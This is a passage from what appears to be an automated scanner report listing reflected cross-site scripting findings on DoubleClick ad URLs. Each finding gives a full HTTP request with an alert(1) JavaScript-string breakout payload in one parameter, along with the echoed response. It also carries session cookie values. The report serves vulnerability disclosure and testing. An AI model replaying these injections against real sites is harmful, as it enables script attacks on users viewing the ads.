User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:49:41 GMT
Content-Length: 9062

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
zN2VmNQA4nyoAAAA=,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-1108476a270"-alert(1)-"84104877d0e&campID=80340&crID=110847&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Eh
...[SNIP]...

6.45. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.390

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a0b7"-alert(1)-"69532c69136 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.390;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bf1f9c18805cba7f4%3B12fb0be2376,0%3B%3B%3B2888316814,smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAdiO-sC8BAAAAAAAAADE1OTYwZmYyLTc0YmEtMTFlMC1hYWUzLTAwMjM3ZDQzN2VmNQA4nyoAAAA=,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=110847&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml8a0b7"-alert(1)-"69532c69136&redirectURL=;ord=1304340341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABcOWgN9IsHCvhK0lkUX7yuRwW0ceklLOf6oZ84AAAAAA==,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D2052082148%26u%3Dhttp%253A%252F%252Fwww.theage.com.au%252Fnational%252Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,15960ff2-74ba-11e0-aae3-00237d437ef5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:50:56 GMT
Content-Length: 9062

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
mpID=80340&crID=110847&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml8a0b7"-alert(1)-"69532c69136&redirectURL=http%3a%2f%2fwww.tdameritrade.com/offer/250freetrades/%3Fa%3DGVQ%26o%3D199%26cid%3DGENRET%3B877237%3B62579218%3B239944197%3B41633480");
var fscUrl = url;
var fscUrlClickTagFound = fals
...[SNIP]...

6.46. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [campID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.684

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1445"-alert(1)-"98a4c2b7cc0 was submitted in the campID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.684;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bdd3d96d5de90549c%3B12fb0be7129,0%3B%3B%3B1383521841,yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAKXG-sC8BAAAAAAAAADFjYTQ4NGNjLTc0YmEtMTFlMC1hZDg3LTAwMWIyNDc4M2JjOAA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340c1445"-alert(1)-"98a4c2b7cc0&crID=110787&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340361? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBuXyB.4sHClCQE2nLULjPiaSFWBRhOjldZdiMAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D518457643%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,1ca484cc-74ba-11e0-ad87-001b24783bc8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:50:41 GMT
Content-Length: 9287

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340c1445"-alert(1)-"98a4c2b7cc0&crID=110787&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer
...[SNIP]...

6.47. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [crID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.684

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e83d"-alert(1)-"f2aef3fa5b7 was submitted in the crID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.684;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bdd3d96d5de90549c%3B12fb0be7129,0%3B%3B%3B1383521841,yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAKXG-sC8BAAAAAAAAADFjYTQ4NGNjLTc0YmEtMTFlMC1hZDg3LTAwMWIyNDc4M2JjOAA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=1107875e83d"-alert(1)-"f2aef3fa5b7&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340361? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBuXyB.4sHClCQE2nLULjPiaSFWBRhOjldZdiMAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D518457643%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,1ca484cc-74ba-11e0-ad87-001b24783bc8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:50:54 GMT
Content-Length: 9287

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
inion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=1107875e83d"-alert(1)-"f2aef3fa5b7&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%
...[SNIP]...

6.48. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [partnerID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.684

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79bb7"-alert(1)-"19c0f79625f was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.684;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bdd3d96d5de90549c%3B12fb0be7129,0%3B%3B%3B1383521841,yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAKXG-sC8BAAAAAAAAADFjYTQ4NGNjLTc0YmEtMTFlMC1hZDg3LTAwMWIyNDc4M2JjOAA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=110787&pubICode=1662910&pub=256078&partnerID=979bb7"-alert(1)-"19c0f79625f&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340361? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBuXyB.4sHClCQE2nLULjPiaSFWBRhOjldZdiMAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D518457643%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,1ca484cc-74ba-11e0-ad87-001b24783bc8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:28 GMT
Content-Length: 9287

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
emporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=110787&pubICode=1662910&pub=256078&partnerID=979bb7"-alert(1)-"19c0f79625f&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=https%3a%2f%2
...[SNIP]...

6.49. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [pub parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.684

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd56c"-alert(1)-"d3ec9aaf18e was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.684;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bdd3d96d5de90549c%3B12fb0be7129,0%3B%3B%3B1383521841,yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAKXG-sC8BAAAAAAAAADFjYTQ4NGNjLTc0YmEtMTFlMC1hZDg3LTAwMWIyNDc4M2JjOAA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=110787&pubICode=1662910&pub=256078cd56c"-alert(1)-"d3ec9aaf18e&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340361? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBuXyB.4sHClCQE2nLULjPiaSFWBRhOjldZdiMAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D518457643%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,1ca484cc-74ba-11e0-ad87-001b24783bc8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:18 GMT
Content-Length: 9287

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
engreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=110787&pubICode=1662910&pub=256078cd56c"-alert(1)-"d3ec9aaf18e&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=h
...[SNIP]...

6.50. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [pubICode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.684

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a033"-alert(1)-"9d0261df748 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.684;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bdd3d96d5de90549c%3B12fb0be7129,0%3B%3B%3B1383521841,yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAKXG-sC8BAAAAAAAAADFjYTQ4NGNjLTc0YmEtMTFlMC1hZDg3LTAwMWIyNDc4M2JjOAA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=110787&pubICode=16629107a033"-alert(1)-"9d0261df748&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340361? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBuXyB.4sHClCQE2nLULjPiaSFWBRhOjldZdiMAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D518457643%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,1ca484cc-74ba-11e0-ad87-001b24783bc8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:08 GMT
Content-Length: 9287

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=110787&pubICode=16629107a033"-alert(1)-"9d0261df748&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&re
...[SNIP]...

6.51. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.684

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9511b"-alert(1)-"27fa9528383 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

